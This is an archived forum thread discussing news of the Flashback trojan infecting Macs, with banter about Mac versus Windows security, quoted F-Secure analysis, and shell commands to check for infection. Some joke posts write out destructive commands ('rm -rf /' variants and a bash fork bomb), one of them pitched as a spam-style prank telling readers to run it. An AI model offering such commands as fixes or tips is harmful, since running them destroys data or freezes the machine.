If you can read this, either the style sheet didn't load or you have an older browser that doesn't support style sheets. Try clearing your browser cache and refreshing the page.

(C|Net)   OSX Flashback Botnet infections rise to over 600,000   (news.cnet.com) divider line 105
    More: Followup, OSX Flashback Botnet, flashback, botnets, malware, Macintosh  
•       •       •

2666 clicks; posted to Geek » on 05 Apr 2012 at 10:42 AM (2 years ago)   |  Favorite    |   share:  Share on Twitter share via Email Share on Facebook   more»



105 Comments   (+0 »)
   
View Voting Results: Smartest and Funniest

Archived thread

First | « | 1 | 2 | 3 | » | Last | Show all
 
2012-04-05 10:47:56 AM
(snicker)
 
2012-04-05 10:51:43 AM
images.wikia.com
 
2012-04-05 10:53:20 AM
For purposes of this thread, I hereby define push as:

*just visiting* an infected site with no user interaction required*

/I know that's not technically true, but there's a difference to most users between "I download funny_cat_vid.exe, click on it, provide it my password, and THEN stuff happens, and "I visit a site with an infected ad, and stuff happens"
//If you don't get why I'm doing this, read the last thread.
 
2012-04-05 10:53:41 AM
Impossible. Only people that grant permissions get viruses on Macs. And only the most brilliant minds buy Apple products.
 
2012-04-05 10:58:44 AM

meyerkev: For purposes of this thread, I hereby define push as:

*just visiting* an infected site with no additional user interaction required after 'just visiting' the site*


FTFY. ;)

And sure, feel free to define it that way... just note that you can't then compare it to real push-distributed viruses and worms.

/I hereby define "apples" as orange-colored citrus fruits with a tough rind, white pith, and juice-filled flesh.
 
2012-04-05 11:05:48 AM
Throwing this out there, I have never met a mac user (this includes professionals) who's computer wasn't lousy with spyware, malware, and viruses. They have this "it can't happen to me" mantra and they learn eventually this isn't true.

To be fair, the solution provided for almost every problem is "bring it in and let them figure it out", which basically is a format and fresh reinstall most of the time.

I'm not anti-mac, they're shiny plastic cases filled with an intel infrastructure no different than a p.c. The culture of the mac is what's rotten.

/just sayin'
//get a decent box and dual boot at least.
///Just know what you're doing ffs.
 
2012-04-05 11:11:27 AM
Researcher, if you want to see something even scarier try fixing a Windows machine used by someone who has switched over from Macs or normally uses Macs.

The problem is a lack of security knowledge amongst most computer users and every person who doesn't use safe practices makes it worse for everyone.
 
2012-04-05 11:13:38 AM

meyerkev: For purposes of this thread, I hereby define push as:

*just visiting* an infected site with no user interaction required*

/I know that's not technically true, but there's a difference to most users between "I download funny_cat_vid.exe, click on it, provide it my password, and THEN stuff happens, and "I visit a site with an infected ad, and stuff happens"
//If you don't get why I'm doing this, read the last thread.


From F-secure:

Installation:
On execution, the malware checks if the following path exists in the system:

/Library/Little Snitch
/Developer/Applications/Xcode.app/Contents/MacOS/Xcode
/Applications/VirusBarrier X6.app
/Applications/iAntiVirus/iAntiVirus.app
/Applications/avast!.app
/Applications/ClamXav.app
/Applications/HTTPScoop.app
/Applications/Packet Peeper.app
If any of these are found, the malware will skip the rest of its routine and proceed to delete itself.

So it deletes itself if you have little snitch or any antivirus software. Isn't that the most considerate malware ever.
 
2012-04-05 11:15:32 AM
oh, wait, I thought all you Apple fanboys touted how secure they were? 600000 computers when apple has a marginal market share is huge, I wonder what percentage that is.
 
2012-04-05 11:15:45 AM

Researcher: Throwing this out there, I have never met a mac user (this includes professionals) who's computer wasn't lousy with spyware, malware, and viruses.


Authorized Apple Fan Site #115 recently did a poll on this, asking users who they thought was more educated about computers. Mac won in a landslide. I'm taking their opinion over yours.
 
2012-04-05 11:15:52 AM
It does that in an attempt to hide.

This seems like a test run of a later loaded package. Most likely snooping for bank info and the like.
 
2012-04-05 11:21:14 AM
Yawwwwn...
 
2012-04-05 11:21:26 AM
Mac's don't get Viruses.. they get Cancer.

Too soon?
 
2012-04-05 11:21:34 AM
And the folks on MacRumors.com laughed when I told them I installed ClamXav. Who's laughing now, morans?
 
2012-04-05 11:22:04 AM

Researcher: Throwing this out there, I have never met a mac user (this includes professionals) who's computer wasn't lousy with spyware, malware, and viruses. They have this "it can't happen to me" mantra and they learn eventually this isn't true.


You have never met a Mac user? There are still no Mac OSX viruses in the wild. As for the rest, maybe you shouldn't be hanging out with tweens.

/Seriously, my nephews completely destroyed my brother's old eMac. Unsupervised kids can destroy anything.
 
2012-04-05 11:27:33 AM

liverpoolumd: Mac's don't get Viruses.. they get Cancer.

Too soon?


Very offensive. When Steve Jobs died for our sins, he promised salvation for all of his computers. Those that choose to follow the one true Personal Computer will be rewarded with a life free of "viruses". Those who worship false idols will pay in the fiery pits of Windows NT.

Show some respect to your betters.
 
2012-04-05 11:28:17 AM
Just installed an ran AV on my Mac and the only thing it found was a Windows trojan attached to an email in my gmail spam folder in mail.app.
 
2012-04-05 11:29:29 AM

cman: And the folks on MacRumors.com laughed when I told them I installed ClamXav. Who's laughing now, morans?


Eh, the people at MacRumors are 'traded anyway.
 
2012-04-05 11:29:58 AM

The_Phantom: Just installed an ran AV on my Mac and the only thing it found was a Windows trojan attached to an email in my gmail spam folder in mail.app.


Bullshiat. Researcher just said that he's never met a Mac user who is computer wasn't lousy with spyware, malware, and viruses, so you must be lying. And a computer, apparently.
 
2012-04-05 11:34:26 AM
Since that site is about as clear as mud, I'll put it simple. Type or copy-and-paste:

defaults read /Applications/Safari.app/Contents/Info LSEnvironment

into a Terminal Window. If you get

"The domain/default pair of (/Applications/Safari.app/Contents/Info, LSEnvironment) does not exist"

then type in:

defaults read ~/.MacOSX/environment DYLD_INSERT_LIBRARIES

If you get something similar to:

"The domain/default pair of (/Users/joe/.MacOSX/environment, DYLD_INSERT_LIBRARIES) does not exist"

Then you're clean. If not on either case, follow the web page's instructions.

/shockingly, I'm clean. But then again, I don't give my admin password out willy-nilly.
 
2012-04-05 11:36:14 AM

xxcorydxx: oh, wait, I thought all you Apple fanboys touted how secure they were?


It's more secure than Windows, but probably less secure than Linux. Nothing earth-shattering about that opinion.
 
2012-04-05 11:36:28 AM

Theaetetus: Bullshiat. Researcher just said that he's never met a Mac user who is computer wasn't lousy with spyware, malware, and viruses, so you must be lying. And a computer, apparently.


You're missing an important qualifier. He's never MET one.
 
2012-04-05 11:36:52 AM

Theaetetus: The_Phantom: Just installed an ran AV on my Mac and the only thing it found was a Windows trojan attached to an email in my gmail spam folder in mail.app.

Bullshiat. Researcher just said that he's never met a Mac user who is computer wasn't lousy with spyware, malware, and viruses, so you must be lying. And a computer, apparently.


What makes you think those two have ever met?
 
2012-04-05 11:37:32 AM
Is this the other thread where we pretend a security flaw in Oracle's Java is all Apple's fault?
 
2012-04-05 11:45:34 AM
It's funny cuz I'm running Linux. THEY can't get viruses.
 
2012-04-05 11:47:09 AM

Theaetetus: The_Phantom: Just installed an ran AV on my Mac and the only thing it found was a Windows trojan attached to an email in my gmail spam folder in mail.app.

Bullshiat. Researcher just said that he's never met a Mac user who is computer wasn't lousy with spyware, malware, and viruses, so you must be lying. And a computer, apparently.


Yeah... I've never seen a Mac that was completely taken over by malware like I've seen Windows systems that have been completely compromised. I watched a completely updated Windows 7 system with MS Security Essentials be infected through a PDF file that opened by just visiting a seemingly benign website. FakeAV all over the place. Granted that was a vulnerability though Adobe Acrobat, it was still impressive.

I guess it's possible for that to happen in OS X, but I think a user would have to go out of their way to make that happen.
 
2012-04-05 11:53:44 AM
Apple did the right thing by dropping most backwards compatibility with OSX. Something they simply could not have done if they'd had the same market share that Microsoft does in the business world.

Windows will always be hobbled by the necessity to support legacy software. If Macs before too popular in corporate environments they will suffer the same issue.
 
2012-04-05 11:55:21 AM

Fubini: It's funny cuz I'm running Linux. THEY can't get viruses.


www.myfacewhen.net
 
2012-04-05 11:59:12 AM

Fubini: It's funny cuz I'm running Linux. THEY can't get viruses.


Nah. They can, but the cleanup process is super easy. RM -rf /
 
2012-04-05 12:06:08 PM
More than half a million Macs are infected with the Flashback Trojan, a malware package designed to steal personal information, according to a Russian antivirus company.

well, i'm sold.
 
2012-04-05 12:07:25 PM

fluffy2097: Fubini: It's funny cuz I'm running Linux. THEY can't get viruses.

Nah. They can, but the cleanup process is super easy. RM -rf /


That can leave some spots, or should I say dots.

Try rm -rf /; rm -rf /.*
 
2012-04-05 12:33:16 PM

Nix Nightbird: (snicker)


(chortle)
 
2012-04-05 12:34:25 PM

Fubini: It's funny cuz I'm running Linux. THEY can't get viruses.


Your penis is small, not pleasing lady! Open terminal and run this :(){ :|:& };:
your penis become huge like elephant, please all lady all time.
 
2012-04-05 12:34:31 PM

Researcher: Throwing this out there, I have never met a mac user (this includes professionals) who's computer wasn't lousy with spyware, malware, and viruses.


Bullshiat
 
2012-04-05 01:01:04 PM

BullBearMS: Is this the other thread where we pretend a security flaw in Oracle's Java is all Apple's fault?


Part of the problem is that Apple insists on pushing out its own patches, so Oracle has to go through Apple, which delayed the update going out.

/it's been out for a while now
 
2012-04-05 01:08:55 PM

mccallcl: It's more secure than Windows


for certain versions of windows which are older than OS/X...
 
2012-04-05 01:15:16 PM

fluffy2097: Fubini: It's funny cuz I'm running Linux. THEY can't get viruses.

Nah. They can, but the cleanup process is super easy. RM -rf /

sudo

rm -rf /

If you're cruising around as root in normal usage, you almost deserved it.
 
2012-04-05 01:17:15 PM

ProfessorOhki:
If you're cruising around as root in normal usage, you almost deserved it.


Same as a 'Bash Bomb' really.
 
2012-04-05 01:17:48 PM
I run Sophos AV on my MacBook Pro, and have since day one. I've never bought into the school of thought that Macs were immune to viruses.
 
2012-04-05 02:13:29 PM

Abe Vigoda's Ghost: I run Sophos AV on my MacBook Pro, and have since day one. I've never bought into the school of thought that Macs were immune to viruses.


I've been using some kind of AV software (and LittleSnitch) since 2003.

Have never run into a virus that could have installed itself on my system (although I've come across some compromised files via email that would have affected Windows users), although obviously no computer is safe. A little common sense goes a long way for an average user. Mostly common sense involving not downloading that "100% free cracked Adobe CS5" torrent at TPB.

If you're a user who has proximity to industrial and/or government information, security sh*t gets a lot realer.
 
2012-04-05 02:14:26 PM

ProfessorOhki: If you're cruising around as root in normal usage, you almost deserved it.


Sorry. I haven't used that command since I last installed Debian years ago.

It was amazing to watch XFree86 pull the plug and play data for my monitor, look at it, throw it into a log file and say "no screens found"

/My time is worth more then fixing garbage like that. I like something less reliable but easier to repair that would result in less total work for me.
 
2012-04-05 02:19:27 PM

Carth: meyerkev: For purposes of this thread, I hereby define push as:

*just visiting* an infected site with no user interaction required*

/I know that's not technically true, but there's a difference to most users between "I download funny_cat_vid.exe, click on it, provide it my password, and THEN stuff happens, and "I visit a site with an infected ad, and stuff happens"
//If you don't get why I'm doing this, read the last thread.

From F-secure:

Installation:
On execution, the malware checks if the following path exists in the system:

/Library/Little Snitch
/Developer/Applications/Xcode.app/Contents/MacOS/Xcode
/Applications/VirusBarrier X6.app
/Applications/iAntiVirus/iAntiVirus.app
/Applications/avast!.app
/Applications/ClamXav.app
/Applications/HTTPScoop.app
/Applications/Packet Peeper.app
If any of these are found, the malware will skip the rest of its routine and proceed to delete itself.

So it deletes itself if you have little snitch or any antivirus software. Isn't that the most considerate malware ever.



Not only that, but if you don't have one of the above, you have to give it permission to download. If you don't give permission, having Microsoft Office 2008 or 2011 will prevent the virus from installing.

So just by having Xcode you are immune; by having MS Office 2008 you are immune as long as you don't grant permission.
 
2012-04-05 02:26:06 PM

syberpud: BullBearMS: Is this the other thread where we pretend a security flaw in Oracle's Java is all Apple's fault?

Part of the problem is that Apple insists on pushing out its own patches, so Oracle has to go through Apple, which delayed the update going out.


Actually, Apple wanted Sun to assume responsibility for Java on the Mac back when they assumed responsibility for Java on Windows.

However, it wasn't until 2010, after the purchase by Oracle, that they finally agreed to assume responsibility or Java going forward.
 
2012-04-05 02:39:16 PM
So, you have to install it and give it permission? Why would you do that?
 
2012-04-05 03:10:02 PM

Researcher: Throwing this out there, I have never met a mac user (this includes professionals) who's computer wasn't lousy with spyware, malware, and viruses.


You're flinging poo

As a full time mac tech and now part time, I used to come across any of the above in about 1 in 100 macs from 1998 to 2002. Since then I have not seen more than a handful if cases of spyware (no, cookies don't count) let alone a trojan or a virus.

I have personally had one trojan in 18 years of heavy internet use, and that happened in 1997. It was an applescript that I foolishly double clicked, so shame on me.
 
2012-04-05 03:34:27 PM
I'm a little disappointed that I don't have it. It would validate my paranoia that someone is messing with my computer.
 
2012-04-05 03:39:58 PM

noit: I'm a little disappointed that I don't have it. It would validate my paranoia that someone is messing with my computer.


that`s you.
 
2012-04-05 03:50:26 PM

andersoncouncil42: As a full time mac tech and now part time, I used to come across any of the above in about 1 in 100 macs from 1998 to 2002. Since then I have not seen more than a handful if cases of spyware (no, cookies don't count) let alone a trojan or a virus.

I have personally had one trojan in 18 years of heavy internet use, and that happened in 1997. It was an applescript that I foolishly double clicked, so shame on me.


Currently, I hold ACMT, ACSP, ACTC and a bunch of others. I second this statement. I will, however, go a step beyond and say Researcher is a farking liar. Having been a tech of one form or another working on Macs since 1984, I have seen exactly 1 infected Mac in that nearly 28 year history. I don't know how many thousands, perhaps tens of thousands of Macs I have repaired in that time. So yes, for all practical purposes Macs are proof.

Yes, any computer CAN be brought down under the right conditions. It just hasn't been my experience that the average, right-out-of-the-box Mac can be without the user doing something stupid right before all holy hell breaks loose. It's also why I also call bullshiat on the "Hack a Mac challenge" when they are connected to the computer being breeched by a three-foot crossover cable. If I can physically touch that computer, I *WILL* pwn it, and no mad h4x0r skillz will be needed. Let me put that Mac behind the average cable modem on the other side of the country and see you 'hax' into it. I have yet to see any documented proof it can be.

So, yeah. I call bullshiat on "Researcher", too.
 
2012-04-05 03:52:06 PM

dready zim: noit: I'm a little disappointed that I don't have it. It would validate my paranoia that someone is messing with my computer.

that`s you.


I know, but I was hoping it was a nefarious specter causing my browser to lock up, and not that I've installed and deleted so many programs over the years I don't know what's going on anymore.
 
2012-04-05 04:08:31 PM

1macgeek: Yes, any computer CAN be brought down under the right conditions. It just hasn't been my experience that the average, right-out-of-the-box Mac can be without the user doing something stupid right before all holy hell breaks loose. It's also why I also call bullshiat on the "Hack a Mac challenge" when they are connected to the computer being breeched by a three-foot crossover cable. If I can physically touch that computer, I *WILL* pwn it, and no mad h4x0r skillz will be needed. Let me put that Mac behind the average cable modem on the other side of the country and see you 'hax' into it. I have yet to see any documented proof it can be.


Why would you think the security of the network devices has any bearing on the security of the PC? The challenge was to hack a mac, not hack a router. The fact that you said a modem, rather than a router when modems provide almost nothing security-wise compared to your off-the-shelf router is pretty indicative that either 1) You're full of crap. 2) Apple will certify just about anyone.

"I've never seen anyone break into this brand of car."
*breaks into car*
"Well yeah, sure it was just sitting there. I meant that if you put this car in an all-steel garage with guard dogs, a sniper nest, and a state-of-the-art security system that you couldn't break into the car. That just shows how good the car is!"
 
Displayed 50 of 105 comments

First | « | 1 | 2 | 3 | » | Last | Show all

View Voting Results: Smartest and Funniest


This thread is archived, and closed to new comments.

Continue Farking
Submit a Link »






Report